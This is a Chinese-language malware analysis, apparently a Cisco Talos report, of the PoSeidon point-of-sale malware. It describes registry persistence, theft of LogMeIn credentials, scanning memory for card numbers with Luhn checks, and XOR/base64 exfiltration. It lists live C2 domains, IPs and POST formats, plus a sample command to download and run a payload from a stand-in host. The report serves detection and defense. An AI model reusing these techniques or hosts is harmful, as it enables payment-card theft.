思科安全解決方案(CSS) 團隊由具備法律實施、企業安全和技術安全等豐富背景的信息安全專家組成。該團隊直接與思科Talos安全情報和研究小組展開合作，旨在識別已知和未知的威脅、量化風險并劃分其優先級，最大限度降低未來的風險。

當消費者從零售商處采購時，交易是通過銷售點終端(PoS)系統處理完成的。當使用信用卡或借記卡時，PoS系統被用來讀取存儲在信用卡背面磁條中的信息。一旦該信息被從商家處盜取后，它可被編碼到磁條中，并在一張新卡上加以使用。由于攻擊者能夠輕松地利用盜取的信用卡信息牟利，因而針對這一寶貴信息的犯罪市場一直都存在。涉及PoS惡意軟件的事件一直呈現上升勢頭，這對許多大型企業和家庭式企業都造成了影響，同時也引起了眾多媒體的關注。可以肯定的是，大量金融信息和個人信息的存在，使得這些企業及其零售PoS系統仍會成為極具吸引力的攻擊目標。

概況

今天要介紹的是一款新的針對PoS系統的惡意軟件，這款軟件會在PoS內存中尋找信用卡信息，并將這些信息發送到服務器，服務器使用了.ru頂級域名，這些信息可能會被重新賣出去。這個新的惡意軟件家族(我們取名為PoSeidon)中有些組件，如下圖所示:

首先它會加載Loader，它會試圖留存在目標系統中，防止系統重啟。Loader之后會聯系命令與控制(command and control)服務器，接收一個包含另一個程序的URL，并下載執行。下載下來的程序是FindStr，它會安裝一個鍵盤記錄器，并且在PoS設備中掃描數字序列，這些數字序列就有可能是信用卡號碼。如果經過驗證，這些數字確實是信用卡號碼，鍵盤記錄和信用卡號碼就會被編碼并發送到一個服務器。#p#

技術細節

鍵盤記錄器

這個文件的SHA256校驗值是 334079dc9fa5b06fbd68e81de903fcd4e356b4f2d0e8bbd6bdca7891786c39d4，可能是PoS系 統攻擊的源頭。我們把這個文件叫做鍵盤記錄器(KeyLogger)是基于它的調試信息:

一旦被執行，這個文件就會把自身復制到%SystemRoot%\system32\.exe或者是%UserProfile%\.exe，并在HKLM(或者HKCU)\Software\Microsoft\Windows\CurrentVersion\Run處加入注冊表項。

這個文件還會打開HKCU\Software\ LogMeIn Ignition，打開并刪除PasswordTicket鍵值，獲取Email鍵值，它還會刪除注冊表目錄樹HKCU\Software \LogMeInIgnition\\Profiles\*。

文件會使用POST方法把數據發送到下列URI中的一個地址:

wondertechmy[.]com/pes/viewtopic.php
wondertechmy[.]ru/pes/viewtopic.php
wondwondnew[.]ru/pes/viewtopic.php

URI格式是

uid=%I64u&win=%d.%d&vers=%s

鍵盤記錄器組件是用來竊取密碼的，也有可能是感染機器的初始途徑。

Loader

我們把這個文件叫做loader是基于它的調試信息:

一經運行，Loader會檢查它是不是以以下兩個文件名執行的:

WinHost.exe
WinHost32.exe

如果不是，它就會確保沒有以WinHost名字正在運行的Windows服務。Loader會將自身復制到%SystemRoot%\System32\WinHost.exe，覆蓋掉那里任何可能以相同名字命名的文件。接下來，Loader會啟動一個名為WinHost的服務。

之所以要這么做是因為即使當前用戶注銷，它也要留在內存中。如果Loader不能將自己變成服務，它就會把在內存中的自己的其他實例終 止掉。然后將自身復制到%UserProfile%\WinHost32.exe，并且安裝注冊表鍵HKCU\Microsoft\Windows\CurrentVersion\Run\\WinHost32。最后，它會創建一個新進程進行 %UserProfile%\WinHost32.exe。

既然現在它可以一直留在系統中，Loader就會執行下面的命令將自己刪除:

cmd.exe /c del >> NUL

在內存中運行的Loader會嘗試讀取 %SystemRoot%\System32\WinHost.exe.cfg這里的配置文件。 這份文件中有一個URL列表，這些URL列表是要被加到已經被硬編碼到Loader的URL列表里的。#p#

然后Loader會聯系其中某個被硬編碼的C&C服務器:

linturefa.com
xablopefgr.com
tabidzuwek.com
lacdileftre.ru
tabidzuwek.com
xablopefgr.com
lacdileftre.ru
weksrubaz.ru
linturefa.ru
mifastubiv.ru
xablopefgr.ru
tabidzuwek.ru

對應的IP地址:

151.236.11.167
185.13.32.132
185.13.32.48
REDACTED at request of Federal Law Enforcement
31.184.192.196
91.220.131.116
91.220.131.87

如果上面的某個域名解析到了某個IP地址，程序就會發送HTTP POST請求，請求使用下面的user-agent字串:

Mozilla/4.0 (compatible; MSIE 8.0;Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729;.NET CLR 3.0.30729; Media Center PC 6.0)

POST數據會被發送到:

<IP ADDRESS>/ldl01/viewtopic.php  
<IP ADDRESS>/pes2/viewtopic.php  

POST數據格式為:

uid=%I64u&uinfo=%s&win=%d.%d&bits=%d&vers=%s&build=%s

Loader應從C&C服務器獲取這樣的回應:

{<命令字符(CommandLetter)>:<參數(ArgumentString)>}

示例:

{R:http://badguy.com/malwarefilename.exe}

{b:pes13n|373973303|https://01.220.131.116/ldl01/files/pes13n.exe}

獲取和執行了服務器響應中的可執行文件，PoSeidon的第二部分登場。#p#

FindStr

我們把這個文件叫做FindStr是基于它的調試信息:

這個文件會在系統中安裝一個很小的鍵盤記錄器，這個鍵盤記錄器和這里的描述極為相似。這個鍵盤記錄器截獲的數據稍后會被發送至服務器。

這個惡意軟件會在內存中尋找特定的數字序列:

· 以6, 5, 4開頭的16位數字 (Discover, Visa, Mastercard)

· 以3開頭的15位數字(AMEX)

然后它會使用Luhn算法驗證這些數字是不是真的信用卡或借記卡號碼，代碼片段如下:

接下來，它會嘗試解析下面的這些域名，其中有些域名是很有名的數據竊取服務器:

quartlet.com
horticartf.com
kilaxuntf.ru
dreplicag.ru
fimzusoln.ru
wetguqan.ru

如果上面的某個域名解析到了某個IP地址，程序就會發送HTTP POST請求，請求使用下面的user-agent字串:

Mozilla/4.0 (compatible; MSIE 8.0;Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729;.NET CLR 3.0.30729; Media Center PC 6.0)

POST數據會被發送到:

<IPADDRESS>/pes13/viewtopic.php 

數據格式為:

oprat=2&uid=%I64u&uinfo=%s&win=%d.%d&vers=%s

可選的POST數據(data:信用卡號碼，logs:鍵盤記錄數據)

&data=<XORed_with_0x2A_then_base64_data_unk> 
logs=<XORed_with_0x2A_then_base64_data_unk> 

發送到服務器上的信用卡號碼和鍵盤記錄器的數據都是經過XOR運算并且用base64編碼的。

服務器的回應應該是:

這個機制可以讓惡意軟件根據從服務器收到的指令進行自我更新。#p#

Loader vs FindStr

使用Bindiff對未打包的Loader(版本11.4 )和未打包的FindStr(版本7.1)進行對比，結果顯示62%的函數相同。惡意軟件背后的攻擊者可能開發了某些核心函數，并將它們編譯進庫，然后他們開發的其他項目可以直接使用這些函數。

IOC

點擊查看終端IOC版本

Win.Trojan.PoSeidon.RegistryItem.ioc
Win.Trojan.PoSeidon.ProcessItem.ioc
Win.Trojan.PoSeidon.FileItem.ioc

域名

linturefa.com
xablopefgr.com
tabidzuwek.com
linturefa.ru
xablopefgr.ru
tabidzuwek.ru
weksrubaz.ru
mifastubiv.ru
lacdileftre.ru
quartlet.com
horticartf.com
kilaxuntf.ru
dreplicag.ru
fimzusoln.ru
wetguqan.ru

IP地址:

151.236.11.167
185.13.32.132
185.13.32.48
REDACTED at request of Federal Law Enforcement
31.184.192.196
91.220.131.116
91.220.131.87
REDACTED at request of Federal Law Enforcement

結論

PoSeidon是又一個針對PoS系統的惡意軟件，它顯示出其作者的高超技術。攻擊者會繼續針對PoS系統進行攻擊，并且使用各種混淆手段逃避檢測。只要PoS攻擊能夠提供回報，攻擊者們就會繼續研發新的惡意軟件。網絡管理員們應該要保持警惕，并且使用最佳解決方案保證免受這些惡意軟件的攻擊。

Snort Rules: 33836-33852. 請參照Defense Center or FIREsight 管理終端的更新信息。

保護用戶防御威脅

我們鼓勵大家通過面向威脅的方法架構，開始最佳的安全實踐。在當今不斷變化的安全形勢下，這種以威脅為中心的、合理的方法架構，將完全保護您的網絡并貫穿“之前、期中、之后”的威脅攻擊的全過程。它基于卓越的可視化能力，持續的控制能力和高級威脅防御，包括外延網絡和貫穿攻擊的全過程。